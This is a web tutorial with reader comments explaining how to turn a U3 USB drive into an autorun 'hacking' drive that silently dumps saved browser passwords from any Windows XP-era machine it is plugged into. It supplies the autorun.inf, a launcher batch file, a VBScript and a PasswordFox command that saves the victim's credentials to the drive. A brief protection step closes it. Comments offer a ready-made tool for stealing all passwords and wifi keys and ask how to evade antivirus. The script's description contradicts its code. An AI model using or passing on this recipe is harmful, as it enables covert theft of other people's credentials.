loading
Picture of How To Make An Auto Hacking Wardrive
When it comes to computer security, sometimes it's good to know what it is that you're trying to protect yourself from. In this video, I'm going to cover the AutoRun feature in Windows and why, for security reasons, you should never use it. To prove my point, I'm going to show you how to make a USB drive that exploits the autorun feature to automatically download and save a users information just by plugging it into a USB port.

 
Remove these adsRemove these ads by Signing Up

Step 1: Material List

Picture of Material List
224_wardrive_transcoded.mp4_snapshot_00.49_[2010.06.24_09.44.28].jpg
224_wardrive_transcoded.mp4_snapshot_01.08_[2010.06.24_09.45.01].jpg
To do this project, you are going to need:
- U3 usb drive, such as a sandisk cruizer,
- Access to a Windows XP machine.

What makes a U3 usb drive unique is that it emulates a CD rom drive so that it can autorun it's "launchpad" whenever you plug it into your computer. This is useful because Windows will not allow programs to autorun straight from a USB drive, but it will allow programs to autorun from CD drives and since a U3 usb drive shows up as both, we can use this feature to autorun our USB drive.

Step 2: Download Universal Customizer

Picture of Download Universal Customizer
224_wardrive_transcoded.mp4_snapshot_01.15_[2010.06.24_09.50.05].jpg
224_wardrive_transcoded.mp4_snapshot_01.35_[2010.06.24_09.50.52].jpg
Backup everything that's currently on your USB drive. Then go to this website: http://www.u3community.com/viewtopic.php?t=434 and download the "Universal Customizer" program. This program is going to allow us to replace the U3 Launchpad application with our own autolaunching application. Unfortunately, this program only works on Windows XP, so you'll have to have an XP machine to run this. When it's through downloading, extract all of the files to your desktop and open up the "U3CUSTOM" folder. This folder is where we're going to create our custom autolaunching program

Step 3: Creating the Autorun and Launch files

Picture of Creating the Autorun and Launch files
224_wardrive_transcoded.mp4_snapshot_02.00_[2010.06.24_10.10.18].jpg
224_wardrive_transcoded.mp4_snapshot_02.13_[2010.06.24_10.10.46].jpg
224_wardrive_transcoded.mp4_snapshot_02.21_[2010.06.24_10.11.07].jpg
The first thing that we want to do is create an "autorun" file, so right click within the folder and select "new > text document". Rename it as "autorun.inf" and then double click on it to open it up. Type:

[AutoRun]
open=launch.exe -a


Then click File > Save. This will autorun a program called "launch.exe" that we're going to make right now. So right click in the folder again and select "new>textdocument" and rename it "launch.bat". Then right click on it and select "edit". Now type:

\usb.vbs


Save, and close it. This will tell it to open a file called "usb.vbs" that we will create in a second. But first we need to convert the batch file to an executable that Windows can autorun.

Step 4: Converting BAT to EXE

Picture of Converting BAT to EXE
224_wardrive_transcoded.mp4_snapshot_02.44_[2010.06.24_10.15.54].jpg
224_wardrive_transcoded.mp4_snapshot_02.48_[2010.06.24_10.16.03].jpg
To convert launch.bat to an executable, go to this website http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html and download the Bat to EXE converter. Open it up and run the exe file. For the "Batch file" field, point to the "launch.bat" file that you created. Then click "compile". You should now see a "launch.exe" file in your "U3Custom" folder.

Step 5: Creating the USB.vbs script

Picture of Creating the USB.vbs script
224_wardrive_transcoded.mp4_snapshot_03.04_[2010.06.24_10.21.02].jpg
Now let's create the usb.vbs file. This will find the drive letter of the USB drive so that we can automatically save stuff to it. So, create another new text document and rename it to "usb.vbs". Then right click on it and select edit. You want to type in this code:

Dim oFSO, oDrive,objFolder,oUsbDrive,oDestination, shell
Const USBDRIVE=1
oDestination = "c:\test"
Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
Set shell=createobject("wscript.shell")
'Get USB drive letter
For Each oDrive In oFSO.Drives

If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter <> "A" Then
WScript.Echo "found usb at", oDrive.DriveLetter
oUsbDrive = oDrive.DriveLetter & ":\"
shell.run oDrive.DriveLetter & ":\PasswordFox.exe"
set shell=nothing
End If
Next
Sub CopyFiles(oPath, oDst)
Set objFolder = oFSO.GetFolder(oPath)
For Each Files In objFolder.Files
WScript.Echo "Copying File",Files
newDst=oDst&"\"&Files.Name
oFSO.CopyFile Files,newDst,True
WScript.Echo Err.Description
Next
'Recursive copy, uncomment if needed
' For Each oDir In objFolder.SubFolders
' CopyFiles oDir.Path, oDst
' Next
End Sub


Basically what this script does is scan the computer for a USB drive and then executes a file called "batch.bat" from that USB drive. Once you have that done, click save and exit and now we can burn this to our U3 drive.

Step 6: Burn the files to the Virtual U3 CD

Picture of Burn the files to the Virtual U3 CD
224_wardrive_transcoded.mp4_snapshot_03.31_[2010.06.24_10.25.41].jpg
224_wardrive_transcoded.mp4_snapshot_03.33_[2010.06.24_10.25.50].jpg
Go back up to the main "universal customizer" directory and click "isocreate.cmd". This will turn our folder into an iso file that we will then put on the USB drive. Now click on "universal_customizer.exe". Just follow the instructions in the program and it will set up your U3 drive to run our custom created launcher. When it's through, click done. You will need to pull out your usb drive and plug it back in and it may give you an error, but that's because we haven't put any programs on it, which we will do in the next step.

Step 7: Loading the hacking programs

Picture of Loading the hacking programs
224_wardrive_transcoded.mp4_snapshot_04.16_[2010.06.24_10.35.07].jpg
224_wardrive_transcoded.mp4_snapshot_04.26_[2010.06.24_10.35.21].jpg
224_wardrive_transcoded.mp4_snapshot_04.52_[2010.06.24_10.36.06].jpg
224_wardrive_transcoded.mp4_snapshot_05.05_[2010.06.24_10.50.12].jpg
You can find some good programs at "nirsoft.net" that are good for retrieving passwords and information. Such as PasswordFox. Just extract the files and copy them to your USB drive. Lastly, we need to create a USB file that runs the program silently and stores the data it collects back on the USB drive. So right click in the USB drive and create a new text file and rename it "batch.bat". Then right click on it and select "edit". To launch the program type:

start %~dp0PasswordFox.exe /shtml %~dp0firefox.html


you want to replace "PasswordFox.exe" with whatever program you downloaded. And according to the nirsoft website that we downloaded it from, if we want to save the password results as an html file, we can type /shtml firefox.html. Now to make sure that it reads it and saves it to the USB drive, we need to put "%~dp0" before both filenames. Now save the file and test it out. Put it in a computer that has autorun enabled and within a second, you should have an html file saved to your USB drive with the users information.

Step 8: Protection

The best way to protect yourself from this type of hack is to disable any type of autorun feature. To enable/disable autorun in windows xp, go to "start > run" type gpedit.msc and hit enter. Select "Administrative Templates > System" and then double click on "Turn off autoplay" to enable/disable it. In vista and 7 go to start and type "gpedit.msc", select administrative templates > Windows Components" and double click on "Autoplay policies" to enable or disable it.
can you simply do this on a CD instead?

Ya, i think so

hi !

i have a couple of questions:

why do some hacking files like WebBrowserNetView,ChromPass,PasswordFox

are saving as a .cfg file and others save as.html like operapass...etc.

how can i fix this problem ?

hope anyone replies.

Thank you .

hy bro i make that all files which done all the process which u want within 10 second u can stole all passwords of a computer like all browsers password which save init.and also stole each wifi password which that computer ur laptop connected if u want that file so cntct..... www.facebook.com/shahrox.xhan.2

some of this stuff cannot be done because of the Antivirus!
any option to do so?

damavox.8 months ago

Where can i find this the software now?

It seems the site u3community has been abandoned.

SanjivA11 months ago

The U3 download link does not seem to work.

122boy3 years ago
how to you make it save the passwords in a text document
does it work on windows 7
jvpernis4 years ago
Can a usb, when plugged in, shut down(but remember everything) all activated processes except the OS processes (just like safe mode) and when you pull it out restore everything to the situation before you plugged in the usb? That would be a real secure usb drive..
junits154 years ago
auto run no longer works for flash drives in windows 7
Yandle5 years ago
Norton trashed the Password Fox exe and yelled at me that it was a virus..
Redgerr Yandle5 years ago
ahahaha, it might be eh
PCfreak5 years ago
um.......... i think your link u3community.com isnt working for me
Glad I do not use Microsoft Windows software.
What do you use?
Actually I do have a token xp box. Mostly use open source operating systems such as various linuxes, bsd and other os's.
Go Linux! But I have a mac. Well atleast macs cant do this instructable
I ran osx for a while on some ppc g3's till I converted them to linux. I eventually dumped those machines. On linux there is wine and and there is a corresponding open source program on mac, but I forget he name. Not sure whether you could get hose programs to work though.
Yeah to use the windows apps on linux and mac I have linux on my brothers computer with wine
http://www.google.com/#hl=en&source=hp&q=wine+on+osx&aq=f&aqi=g1g-m1&aql=&oq=&gs_rfai=CYjiasX4kTKG-IKPuzATv7fXRCgAAAKoEBU_Qz5D1&fp=abb01c78b666a2d
bowmaster5 years ago
This is neat. Any chance there will be a Vista/7 version soon?
gigafide (author)  bowmaster5 years ago
This works on Vista/7. You just have to initially set it up using XP because the Unverisial software only runs on XP.
Oh, OK. I have an XP machine.